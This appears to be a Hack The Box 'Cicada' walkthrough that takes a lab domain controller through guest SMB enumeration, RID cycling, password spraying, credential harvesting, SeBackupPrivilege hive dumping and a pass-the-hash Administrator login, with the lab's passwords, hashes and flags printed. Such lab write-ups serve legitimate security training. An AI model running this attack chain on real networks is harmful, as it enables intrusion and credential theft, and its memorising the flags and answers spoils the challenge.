HTB Cicada
Cicada
Start with nmap:
# nmap -sT -p- --min-rate 10000 -o ports 10.129.254.230
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-06 05:09 CST
Nmap scan report for 10.129.254.230
Host is up (0.0020s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
53606/tcp open unknown
SMB (445) is open. Together with DNS, Kerberos (88/464), LDAP (389/636) and the global catalog ports (3268/3269) this is the port profile of a domain controller, and 5985 (WinRM) will matter later for getting a shell.
What is the name of the non-default SMB share that is readable with guest access on Cicada?
Probe the host:
# nxc smb 10.129.254.230
SMB 10.129.254.230 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
The DC is CICADA-DC in the domain cicada.htb. signing:True means SMB signing is required, so NTLM relay against this host is not an option. Add a hosts entry for the domain name:
echo "10.129.254.230 cicada.htb" | sudo tee -a /etc/hosts
List the shares over SMB with an empty password (the DC falls back to a guest session):
# smbclient -L 10.129.254.230
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
DEV Disk
HR Disk
HR is the non-default share that stands out.
What is the name of the file found in the HR share?
Connect to it:
#smbclient '\\10.129.254.230\HR'
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 07:29:09 2024
.. D 0 Thu Mar 14 07:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 12:31:48 2024
Which user has left their password in Active Directory metadata?
Download and read the file; the relevant line is:
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
A default password is only useful with a list of usernames, so enumerate them by RID cycling over SAMR. Any username with an empty password works here, because the login falls back to the guest session:
nxc smb 10.129.254.230 -u 1 -p '' --rid-brute
Then filter the output down to bare usernames (the SidTypeUser entries, with the DOMAIN\ prefix stripped):
# nxc smb 10.129.254.230 -u 1 -p '' --rid-brute | grep 'SidTypeUser' | sed 's/.*\\\(.*\) (SidTypeUser)/\1/' > users.txt
# cat users.txt
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
Spray the default password across the whole list (krbtgt and the machine account CICADA-DC$ are harmless noise here, but they can never succeed with a user password):
# nxc smb 10.129.254.230 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
<...>
STATUS_LOGON_FAILURE
SMB 10.129.254.230 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
michael.wrightson still has the default password. Check which shares this account can read:
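As an added example (not code from the original writeup), the filtering step above as a small shell function run over a constructed sample of nxc --rid-brute output. It goes one step further than the page's sed one-liner: machine accounts (trailing $) and krbtgt are dropped, since they have random passwords and only add noise and lockout risk to a spray. The sample lines are constructed to mimic nxc's "RID: DOMAIN\name (SidType)" format; the IP and domain name are taken from the page, and the function name is my own.

```shell
#!/bin/sh
# Constructed sample of `nxc smb 10.129.254.230 -u 1 -p '' --rid-brute`
# output (assumption: mimics nxc's format, not a real capture).
RID_OUTPUT='SMB 10.129.254.230 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.254.230 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.254.230 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.129.254.230 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.129.254.230 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.254.230 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.254.230 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)'

# spray_targets RID_OUTPUT -> one sAMAccountName per line, suitable for -u users.txt.
# Keeps only SidTypeUser entries (groups and aliases are not logon accounts),
# strips the DOMAIN\ prefix, and drops machine accounts (name ends in $) and
# krbtgt, which both have long random passwords and cannot match a sprayed one.
spray_targets() {
    printf '%s\n' "$1" \
    | sed -n 's/.*\\\(.*\) (SidTypeUser)$/\1/p' \
    | grep -v '\$$' \
    | grep -vx 'krbtgt'
}

# Stand-alone run: write the list the same way the page does.
spray_targets "$RID_OUTPUT" > users.txt
cat users.txt
```

Before spraying, check the domain lockout policy (nxc smb 10.129.254.230 -u michael.wrightson -p '<password>' --pass-pol, or with the guest session) so that one pass over the list cannot lock anyone out; --continue-on-success, as used above, keeps testing after the first valid login so that every account on the default password is found in a single pass.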
# nxc smb 10.129.254.230 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
<...>
SMB 10.129.254.230 445 CICADA-DC DEV
DEV is listed without READ, so this account cannot read it.
Use the valid account to enumerate the other users; nxc --users also returns each account's description attribute:
# nxc smb 10.129.254.230 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB 10.129.254.230 445 CICADA-DC david.orelious 2024-03-14 12:17:29 1 Just in case I forget my password is aRt$Lp#7t*VQ!3
david.orelious has left his password in the account's description attribute, which every authenticated domain user can read.
What is the name of the PowerShell script located in the DEV share?
Check share permissions with the new account:
#nxc smb 10.129.254.230 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
<...>
SMB 10.129.254.230 445 CICADA-DC DEV READ
This account has READ on DEV. Connect with smbclient and download the script:
# smbclient '\\10.129.254.230\DEV' -U david.orelious --password='aRt$Lp#7t*VQ!3'
smb: \> ls
. D 0 Thu Mar 14 07:31:39 2024
.. D 0 Thu Mar 14 07:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 12:28:22 2024
smb: \> get Backup_script.ps1
What is the emily.oscars user's password?
The script has credentials hard-coded in it:
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
Submit the flag located in the emily.oscars user's home directory.
Log in over WinRM (port 5985, seen in the nmap scan) with those credentials:
#evil-winrm -i 10.129.254.230 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/6/2026 10:05 AM 34 user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
8215ed609febb7466738009d0a877d35
What dangerous privilege does the emily.oscars user have associated with their account?
Check the token privileges:
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeBackupPrivilege is present and enabled. It grants read access to any file or registry hive regardless of its ACL (backup semantics), so the hives that hold local credentials can be copied out by a non-administrator.
Save the SAM and SYSTEM hives and download them. Note that on a domain controller the SAM hive holds only local accounts; domain account hashes live in NTDS.dit, which the same privilege could be used to copy. In this case the Administrator hash from SAM is enough:
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> reg save hklm\sam sam
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> reg save hklm\system sys
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> download sam
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> download sys
Then extract the hashes offline with secretsdump; the SYSTEM hive supplies the boot key that decrypts the SAM entries:
#impacket-secretsdump -sam sam -system sys local
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
Submit the flag located on the Administrator user's Desktop.
Pass the Administrator NT hash straight to evil-winrm (-H, no cleartext password needed) and read the flag:
#evil-winrm -i 10.129.254.230 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/6/2026 10:05 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
d4275811a1ac43f27c79d1d6aa228693
Summary
This box covers SMB share and user enumeration (guest listing, RID cycling, password spraying, reading credentials out of the description attribute and a share), then abusing SeBackupPrivilege to dump the SAM and SYSTEM hives and finishing with a pass-the-hash login as Administrator.
License:
CC BY 4.0